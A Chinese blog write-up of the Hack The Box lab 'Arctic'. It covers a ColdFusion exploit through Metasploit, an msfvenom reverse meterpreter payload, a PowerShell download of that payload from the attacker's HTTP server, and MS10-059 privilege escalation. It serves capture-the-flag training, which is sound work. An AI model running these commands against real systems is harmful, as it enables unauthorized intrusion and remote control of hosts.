HTB靶场记录(七 Arctic)

皮卡皮卡丘 · 皮卡皮卡丘

0x00:靶机介绍

这次的靶机是windows靶机。建议用MSF做前期的getshell,这样方便点。提权部分可能要手工编造PowerShell脚本传文件。

0x01:信息收集

还是先用nmap进行一波端口探测,终于遇到一个没80端口的了。。。。

命令:nmap -A -sS -sV -v -p- 10.10.10.11

这里只能慢慢一个一个查，8500端口是唯一能正常访问的。

那么逐一访问两个文件夹里面的内容一直到/CFIDE/administrator发现一个正常的WEB登录页面

0x02:利用MSF get shell

遇事不决问MSF,然而一搜就发现太多payload了。。。

那只能先进入MSF 找到一个扫描版本的payload。这样可以缩短查找范围

那么使用该payload，设置好参数以后run，成功得知版本为8

缩短范围后，可以确定我们这次要用的payload是这个MSF自带的。

然而裂开了，第一次卡BUG卡在设置payload好久。。。之后问问大佬，结果要设置延迟时间行吧把。行吧我们去到payload那里改,把5改为30

此时重启波MSF使用exploit/windows/http/coldfusion_fckeditorpayload。设置波参数成功得到一个普通用户shell。

命令:set RHOSTS 10.10.10.11

SetRPORT 8500

SetLHOST 10.10.14.5

SetLPORT 5555

run

顺便去到tolis/desktop得到flag。

0x03:添加shell

虽然我们拿到了shell,但提权对于我这种菜鸡来说还是太难了。需要用到MSF的local_exploit_suggester。我们需要在MSF下再拿一个shell运行它。所以需要先制作一个小exe的马

命令:msfVENOM -pwindows/x64/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=5555 -f exe>shell1.exe

然后打开我们的python3共享模式

命令: python -m http.server 8082 此时在我们的靶机上要把exe给下载过来。属实折磨我，毕竟Linux跟Windows是不一样的研究了一下传输命令是这样的需要用到PowerShell，去网上找了个模板套了一下变成以下命令,成功把shell1.exe传过来了。命令: PowerShell (new-object Net.WebClient).DownloadFile('http://10.10.14.5:8082/shell1.exe','c:\Users\tolis\Desktop\shell1.exe')

同时启动MSF,用exploit/multi/handler payload,注意这里一定要设置payload为windows/x64/meterpreter_reverse_tcp。这里在靶机上运行shell1.exe成功进入meterpreter。这时候我们同时有2个shell了。

0x04:利用辅助得到可利用的漏洞信息

关于windows靶机提权有2种方法第一种是利用MSF获得shell以后要使用到自带神器local_exploit_suggester。可以看到有3个可以利用的。据大佬说这3个都可以利用。

命令:ctrl+z Y 退出meterpreter回到background界面

usepost/multi/recon/local_exploit_suggester

setsession n

run

另外一种方法是有一个用神器windowexploitsuggester,比MSF扫出的多点。准确性嘛emmmm,最后决定用MS10-059(如果不会用的话可以看这篇文章https://blog.csdn.net/weixin_45650977/article/details/112554489)

经过逐一筛选可确定是MS10-059有个payload在github页面https://github.com/Re4son/Chimichurri

0x05:提权

然而由于不知道啥原因。大佬随便用MSF选那3个检测的洞随随便便就能搞定。而我各种线程注入，钻来钻去都失败了。重启靶机n次都不行。只能用powershell脚本把我的Chimichurri.exe下载传过来。然后再慢慢弄。这里演示波如果我没用MSF添加shell时,如何方便传文件。

这是最终版powershell脚本，windows上echo跟Linux echo一样同样可以写入文件里面。

这里解析一波,如果我说的不对请多多包容

首先我们要创建一个WebClient对象(New-Object System.Net.WebClient)然后赋值給变量$webclient。

接着定义好我们要用python共享的端口和文件(注意一定要对大小写特别敏感,GitHub上下载下来的是Chimichurri.exe,而我这里写的是chimichurri.exe,我还疑惑了好久到底是哪出问题了)。然后指定接收后的文件改名为exploit.exe。而后面的WebClient.DownloadFile就是把将具有指定URL的文件下载到靶机上。最后开始用powershell.exe执行。这是菜鸟脚本而已。实在不行就在MSF添加shell以后上传也行。